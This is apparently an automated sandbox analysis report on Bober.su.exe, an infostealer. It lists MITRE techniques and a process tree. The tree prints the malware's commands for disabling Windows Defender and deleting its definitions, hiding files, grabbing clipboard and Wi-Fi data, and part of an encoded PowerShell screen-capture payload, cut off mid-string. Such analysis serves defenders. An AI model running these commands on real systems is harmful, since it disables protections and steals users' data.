cbe72bddd72e482fe141a01202878031d3959f1e4df675872094e38d30f821ea

Analysis

max time kernel
5s
max time network
6s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20241023-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
06-12-2024 11:13

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Bober.su.exe
Size

7.4MB
MD5

6e546ac9997b820e109fd7b3b50a444b
SHA1

4ec0f21203a8c17bed27092749917298676a07cb
SHA256

cbe72bddd72e482fe141a01202878031d3959f1e4df675872094e38d30f821ea
SHA512

f3ba186d39df8e83052e93765ce8e9447f9a63c4654092a2b90b7f1ddbf539fd534a4020af0289d5fb572017fe44c268db48a46b294118585529f66e819b27ed
SSDEEP

196608:Er3l8PELjv+bhqNVoB0SEsucQZ41JBbIP11tJD:c8PEL+9qz80SJHQK1Jy1vJD

Score

10^/10

collection credential_access defense_evasion discovery evasion execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Deletes Windows Defender Definitions 2 TTPs 1 IoCs

Uses mpcmdrun utility to delete all AV definitions.

evasion

Impair Defenses

T1562

Command and Scripting Interpreter

T1059

pid	Process
1268	MpCmdRun.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2748	powershell.exe
4524	powershell.exe
4408	powershell.exe
2108	powershell.exe
1304	powershell.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
3100	cmd.exe
4876	powershell.exe

Loads dropped DLL 17 IoCs

pid	Process
1256	Bober.su.exe
1256	Bober.su.exe
1256	Bober.su.exe
1256	Bober.su.exe
1256	Bober.su.exe
1256	Bober.su.exe
1256	Bober.su.exe
1256	Bober.su.exe
1256	Bober.su.exe
1256	Bober.su.exe
1256	Bober.su.exe
1256	Bober.su.exe
1256	Bober.su.exe
1256	Bober.su.exe
1256	Bober.su.exe
1256	Bober.su.exe
1256	Bober.su.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
9	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 4 IoCs

discovery

Process Discovery

T1057

pid	Process
64	tasklist.exe
756	tasklist.exe
3924	tasklist.exe
2156	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
2340	cmd.exe

UPX packed file 42 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0028000000045059-21.dat	upx
behavioral1/memory/1256-25-0x00007FFB11340000-0x00007FFB1192E000-memory.dmp	upx
behavioral1/files/0x002800000004504c-27.dat	upx
behavioral1/files/0x0028000000045057-29.dat	upx
behavioral1/files/0x0028000000045053-47.dat	upx
behavioral1/memory/1256-48-0x00007FFB1C5C0000-0x00007FFB1C5CF000-memory.dmp	upx
behavioral1/files/0x0028000000045052-46.dat	upx
behavioral1/files/0x0028000000045051-45.dat	upx
behavioral1/files/0x0028000000045050-44.dat	upx
behavioral1/files/0x002800000004504f-43.dat	upx
behavioral1/files/0x002800000004504e-42.dat	upx
behavioral1/files/0x002800000004504d-41.dat	upx
behavioral1/files/0x002800000004504b-40.dat	upx
behavioral1/files/0x002800000004505e-39.dat	upx
behavioral1/files/0x002800000004505d-38.dat	upx
behavioral1/files/0x002800000004505c-37.dat	upx
behavioral1/files/0x0028000000045058-34.dat	upx
behavioral1/files/0x0028000000045056-33.dat	upx
behavioral1/memory/1256-30-0x00007FFB14B50000-0x00007FFB14B74000-memory.dmp	upx
behavioral1/memory/1256-54-0x00007FFB12A80000-0x00007FFB12AAD000-memory.dmp	upx
behavioral1/memory/1256-56-0x00007FFB1A060000-0x00007FFB1A079000-memory.dmp	upx
behavioral1/memory/1256-58-0x00007FFB125B0000-0x00007FFB125D3000-memory.dmp	upx
behavioral1/memory/1256-60-0x00007FFB03F40000-0x00007FFB040B6000-memory.dmp	upx
behavioral1/memory/1256-62-0x00007FFB14CA0000-0x00007FFB14CB9000-memory.dmp	upx
behavioral1/memory/1256-64-0x00007FFB1C3C0000-0x00007FFB1C3CD000-memory.dmp	upx
behavioral1/memory/1256-66-0x00007FFB126D0000-0x00007FFB12703000-memory.dmp	upx
behavioral1/memory/1256-71-0x00007FFB03E70000-0x00007FFB03F3D000-memory.dmp	upx
behavioral1/memory/1256-74-0x00007FFB14B50000-0x00007FFB14B74000-memory.dmp	upx
behavioral1/memory/1256-73-0x00007FFB03940000-0x00007FFB03E62000-memory.dmp	upx
behavioral1/memory/1256-70-0x00007FFB11340000-0x00007FFB1192E000-memory.dmp	upx
behavioral1/memory/1256-76-0x00007FFB126B0000-0x00007FFB126C4000-memory.dmp	upx
behavioral1/memory/1256-79-0x00007FFB1AF40000-0x00007FFB1AF4D000-memory.dmp	upx
behavioral1/memory/1256-82-0x00007FFB03820000-0x00007FFB0393C000-memory.dmp	upx
behavioral1/memory/1256-81-0x00007FFB1A060000-0x00007FFB1A079000-memory.dmp	upx
behavioral1/memory/1256-78-0x00007FFB12A80000-0x00007FFB12AAD000-memory.dmp	upx
behavioral1/memory/1256-83-0x00007FFB125B0000-0x00007FFB125D3000-memory.dmp	upx
behavioral1/memory/1256-96-0x00007FFB03F40000-0x00007FFB040B6000-memory.dmp	upx
behavioral1/memory/1256-98-0x00007FFB14CA0000-0x00007FFB14CB9000-memory.dmp	upx
behavioral1/memory/1256-127-0x00007FFB126D0000-0x00007FFB12703000-memory.dmp	upx
behavioral1/memory/1256-186-0x00007FFB03E70000-0x00007FFB03F3D000-memory.dmp	upx
behavioral1/memory/1256-188-0x00007FFB03940000-0x00007FFB03E62000-memory.dmp	upx
behavioral1/memory/1256-283-0x00007FFB03820000-0x00007FFB0393C000-memory.dmp	upx

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
3832	cmd.exe
3148	netsh.exe

Detects videocard installed 1 TTPs 2 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4040	WMIC.exe
4464	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
4252	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 27 IoCs

pid	Process
4408	powershell.exe
4408	powershell.exe
1152	WMIC.exe
1152	WMIC.exe
1152	WMIC.exe
1152	WMIC.exe
2108	powershell.exe
2108	powershell.exe
4040	WMIC.exe
4040	WMIC.exe
4040	WMIC.exe
4040	WMIC.exe
4464	WMIC.exe
4464	WMIC.exe
4464	WMIC.exe
4464	WMIC.exe
1304	powershell.exe
1304	powershell.exe
2712	WMIC.exe
2712	WMIC.exe
4876	powershell.exe
2712	WMIC.exe
4876	powershell.exe
2712	WMIC.exe
4876	powershell.exe
2456	powershell.exe
2456	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4408	powershell.exe
Token: SeIncreaseQuotaPrivilege	1152	WMIC.exe
Token: SeSecurityPrivilege	1152	WMIC.exe
Token: SeTakeOwnershipPrivilege	1152	WMIC.exe
Token: SeLoadDriverPrivilege	1152	WMIC.exe
Token: SeSystemProfilePrivilege	1152	WMIC.exe
Token: SeSystemtimePrivilege	1152	WMIC.exe
Token: SeProfSingleProcessPrivilege	1152	WMIC.exe
Token: SeIncBasePriorityPrivilege	1152	WMIC.exe
Token: SeCreatePagefilePrivilege	1152	WMIC.exe
Token: SeBackupPrivilege	1152	WMIC.exe
Token: SeRestorePrivilege	1152	WMIC.exe
Token: SeShutdownPrivilege	1152	WMIC.exe
Token: SeDebugPrivilege	1152	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1152	WMIC.exe
Token: SeRemoteShutdownPrivilege	1152	WMIC.exe
Token: SeUndockPrivilege	1152	WMIC.exe
Token: SeManageVolumePrivilege	1152	WMIC.exe
Token: 33	1152	WMIC.exe
Token: 34	1152	WMIC.exe
Token: 35	1152	WMIC.exe
Token: 36	1152	WMIC.exe
Token: SeDebugPrivilege	2156	tasklist.exe
Token: SeDebugPrivilege	2108	powershell.exe
Token: SeIncreaseQuotaPrivilege	1152	WMIC.exe
Token: SeSecurityPrivilege	1152	WMIC.exe
Token: SeTakeOwnershipPrivilege	1152	WMIC.exe
Token: SeLoadDriverPrivilege	1152	WMIC.exe
Token: SeSystemProfilePrivilege	1152	WMIC.exe
Token: SeSystemtimePrivilege	1152	WMIC.exe
Token: SeProfSingleProcessPrivilege	1152	WMIC.exe
Token: SeIncBasePriorityPrivilege	1152	WMIC.exe
Token: SeCreatePagefilePrivilege	1152	WMIC.exe
Token: SeBackupPrivilege	1152	WMIC.exe
Token: SeRestorePrivilege	1152	WMIC.exe
Token: SeShutdownPrivilege	1152	WMIC.exe
Token: SeDebugPrivilege	1152	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1152	WMIC.exe
Token: SeRemoteShutdownPrivilege	1152	WMIC.exe
Token: SeUndockPrivilege	1152	WMIC.exe
Token: SeManageVolumePrivilege	1152	WMIC.exe
Token: 33	1152	WMIC.exe
Token: 34	1152	WMIC.exe
Token: 35	1152	WMIC.exe
Token: 36	1152	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4408	powershell.exe
Token: SeSecurityPrivilege	4408	powershell.exe
Token: SeTakeOwnershipPrivilege	4408	powershell.exe
Token: SeLoadDriverPrivilege	4408	powershell.exe
Token: SeSystemProfilePrivilege	4408	powershell.exe
Token: SeSystemtimePrivilege	4408	powershell.exe
Token: SeProfSingleProcessPrivilege	4408	powershell.exe
Token: SeIncBasePriorityPrivilege	4408	powershell.exe
Token: SeCreatePagefilePrivilege	4408	powershell.exe
Token: SeBackupPrivilege	4408	powershell.exe
Token: SeRestorePrivilege	4408	powershell.exe
Token: SeShutdownPrivilege	4408	powershell.exe
Token: SeDebugPrivilege	4408	powershell.exe
Token: SeSystemEnvironmentPrivilege	4408	powershell.exe
Token: SeRemoteShutdownPrivilege	4408	powershell.exe
Token: SeUndockPrivilege	4408	powershell.exe
Token: SeManageVolumePrivilege	4408	powershell.exe
Token: 33	4408	powershell.exe
Token: 34	4408	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4948 wrote to memory of 1256	4948	Bober.su.exe	82
PID 4948 wrote to memory of 1256	4948	Bober.su.exe	82
PID 1256 wrote to memory of 4060	1256	Bober.su.exe	83
PID 1256 wrote to memory of 4060	1256	Bober.su.exe	83
PID 1256 wrote to memory of 4988	1256	Bober.su.exe	84
PID 1256 wrote to memory of 4988	1256	Bober.su.exe	84
PID 1256 wrote to memory of 3336	1256	Bober.su.exe	87
PID 1256 wrote to memory of 3336	1256	Bober.su.exe	87
PID 1256 wrote to memory of 4476	1256	Bober.su.exe	89
PID 1256 wrote to memory of 4476	1256	Bober.su.exe	89
PID 4988 wrote to memory of 4408	4988	cmd.exe	91
PID 4988 wrote to memory of 4408	4988	cmd.exe	91
PID 4476 wrote to memory of 1152	4476	cmd.exe	92
PID 4476 wrote to memory of 1152	4476	cmd.exe	92
PID 3336 wrote to memory of 2156	3336	cmd.exe	93
PID 3336 wrote to memory of 2156	3336	cmd.exe	93
PID 4060 wrote to memory of 2108	4060	cmd.exe	94
PID 4060 wrote to memory of 2108	4060	cmd.exe	94
PID 1256 wrote to memory of 2528	1256	Bober.su.exe	97
PID 1256 wrote to memory of 2528	1256	Bober.su.exe	97
PID 2528 wrote to memory of 3104	2528	cmd.exe	99
PID 2528 wrote to memory of 3104	2528	cmd.exe	99
PID 1256 wrote to memory of 1788	1256	Bober.su.exe	100
PID 1256 wrote to memory of 1788	1256	Bober.su.exe	100
PID 1788 wrote to memory of 2020	1788	cmd.exe	102
PID 1788 wrote to memory of 2020	1788	cmd.exe	102
PID 1256 wrote to memory of 1968	1256	Bober.su.exe	103
PID 1256 wrote to memory of 1968	1256	Bober.su.exe	103
PID 1968 wrote to memory of 4040	1968	cmd.exe	105
PID 1968 wrote to memory of 4040	1968	cmd.exe	105
PID 1256 wrote to memory of 1832	1256	Bober.su.exe	106
PID 1256 wrote to memory of 1832	1256	Bober.su.exe	106
PID 4988 wrote to memory of 1268	4988	cmd.exe	108
PID 4988 wrote to memory of 1268	4988	cmd.exe	108
PID 1832 wrote to memory of 4464	1832	cmd.exe	151
PID 1832 wrote to memory of 4464	1832	cmd.exe	151
PID 1256 wrote to memory of 2340	1256	Bober.su.exe	110
PID 1256 wrote to memory of 2340	1256	Bober.su.exe	110
PID 1256 wrote to memory of 3928	1256	Bober.su.exe	111
PID 1256 wrote to memory of 3928	1256	Bober.su.exe	111
PID 2340 wrote to memory of 3056	2340	cmd.exe	114
PID 2340 wrote to memory of 3056	2340	cmd.exe	114
PID 3928 wrote to memory of 1304	3928	cmd.exe	115
PID 3928 wrote to memory of 1304	3928	cmd.exe	115
PID 1256 wrote to memory of 4592	1256	Bober.su.exe	116
PID 1256 wrote to memory of 4592	1256	Bober.su.exe	116
PID 1256 wrote to memory of 2244	1256	Bober.su.exe	117
PID 1256 wrote to memory of 2244	1256	Bober.su.exe	117
PID 1256 wrote to memory of 3280	1256	Bober.su.exe	120
PID 1256 wrote to memory of 3280	1256	Bober.su.exe	120
PID 4592 wrote to memory of 756	4592	cmd.exe	121
PID 4592 wrote to memory of 756	4592	cmd.exe	121
PID 1256 wrote to memory of 3100	1256	Bober.su.exe	122
PID 1256 wrote to memory of 3100	1256	Bober.su.exe	122
PID 2244 wrote to memory of 64	2244	cmd.exe	124
PID 2244 wrote to memory of 64	2244	cmd.exe	124
PID 1256 wrote to memory of 4844	1256	Bober.su.exe	125
PID 1256 wrote to memory of 4844	1256	Bober.su.exe	125
PID 1256 wrote to memory of 804	1256	Bober.su.exe	128
PID 1256 wrote to memory of 804	1256	Bober.su.exe	128
PID 3100 wrote to memory of 4876	3100	cmd.exe	166
PID 3100 wrote to memory of 4876	3100	cmd.exe	166
PID 1256 wrote to memory of 3832	1256	Bober.su.exe	130
PID 1256 wrote to memory of 3832	1256	Bober.su.exe	130

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3056	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Bober.su.exe
"C:\Users\Admin\AppData\Local\Temp\Bober.su.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4948
- C:\Users\Admin\AppData\Local\Temp\Bober.su.exe
  "C:\Users\Admin\AppData\Local\Temp\Bober.su.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1256
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Bober.su.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4060
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Bober.su.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2108
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4988
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4408
  - - C:\Program Files\Windows Defender\MpCmdRun.exe
      "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
      4⤵
      Deletes Windows Defender Definitions
      PID:1268
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3336
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2156
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4476
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1152
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2528
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:3104
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1788
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:2020
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1968
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious behavior: EnumeratesProcesses
      PID:4040
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1832
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious behavior: EnumeratesProcesses
      PID:4464
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Bober.su.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:2340
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Bober.su.exe"
      4⤵
      Views/modifies file attributes
      PID:3056
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‎   .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3928
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‎   .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1304
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4592
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:756
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2244
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:64
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    PID:3280
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2712
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:3100
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:4876
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:4844
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3924
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:804
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1828
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:3832
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:3148
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:4728
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:4252
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4A